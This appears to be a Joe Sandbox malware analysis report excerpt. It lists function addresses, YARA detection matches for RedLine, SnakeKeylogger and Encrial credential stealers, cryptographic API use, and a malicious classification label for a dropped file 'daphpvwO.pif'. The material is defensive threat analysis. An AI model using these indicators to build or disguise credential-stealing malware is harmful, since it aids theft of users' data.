                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBEA2811_2_2CBBEA28
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBEA1811_2_2CBBEA18
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB921011_2_2CBB9210
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB920011_2_2CBB9200
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBCBB011_2_2CBBCBB0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB2BF011_2_2CBB2BF0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB2BE011_2_2CBB2BE0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBCBC011_2_2CBBCBC0
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB233111_2_2CBB2331
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBA37011_2_2CBBA370
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBBA36011_2_2CBBA360
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CBB234011_2_2CBB2340
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CC42EB811_2_2CC42EB8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CC4285011_2_2CC42850
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CC40B3011_2_2CC40B30
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CC4404011_2_2CC44040
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CC421E811_2_2CC421E8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CC41B8011_2_2CC41B80
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CC4933411_2_2CC49334
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CC4AC7211_2_2CC4AC72
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CC42EA811_2_2CC42EA8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CC4284011_2_2CC42840
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CC4881811_2_2CC48818
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CC4882811_2_2CC48828
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CC40B2011_2_2CC40B20
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CC4004011_2_2CC40040
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CC4000611_2_2CC40006
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CC4403011_2_2CC44030
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CC421D811_2_2CC421D8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CC41B7111_2_2CC41B71
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CC4354011_2_2CC43540
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CC4355011_2_2CC43550
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CC492ED11_2_2CC492ED
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2CC492AB11_2_2CC492AB
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2D5FB3C811_2_2D5FB3C8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2D5F5D2811_2_2D5F5D28
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2D5FC6B811_2_2D5FC6B8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2D5F03CF11_2_2D5F03CF
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\Links\daphpvwO.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: String function: 0288457C appears 835 times
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: String function: 0288421C appears 65 times
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: String function: 02893E20 appears 54 times
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: String function: 02884414 appears 246 times
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: String function: 02893E9C appears 45 times
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: String function: 0040E1D8 appears 44 times
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: 11.2.daphpvwO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 11.2.daphpvwO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 11.2.daphpvwO.pif.438038.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.vcc.exe.210b6e48.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 11.2.daphpvwO.pif.29020ca6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.daphpvwO.pif.29020ca6.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.daphpvwO.pif.2a3b5570.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.daphpvwO.pif.2a3b5570.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.daphpvwO.pif.29021b8e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.daphpvwO.pif.29021b8e.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.1.daphpvwO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 11.2.daphpvwO.pif.29020ca6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.daphpvwO.pif.29020ca6.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.1.daphpvwO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 11.2.daphpvwO.pif.2a3b6458.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.daphpvwO.pif.2a3b6458.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.daphpvwO.pif.2a3b5570.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.daphpvwO.pif.2a3b5570.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.1.daphpvwO.pif.438038.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.daphpvwO.pif.29240000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.daphpvwO.pif.29240000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.daphpvwO.pif.29240ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.daphpvwO.pif.29240ee8.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.vcc.exe.212605a8.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 11.2.daphpvwO.pif.2b930000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.daphpvwO.pif.2b930000.9.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.daphpvwO.pif.2a3de990.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.daphpvwO.pif.2a3de990.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.daphpvwO.pif.29240000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.daphpvwO.pif.29240000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000B.00000001.1464557928.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000B.00000002.3809626790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: daphpvwO.pif PID: 3320, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winHTA@22/17@3/4
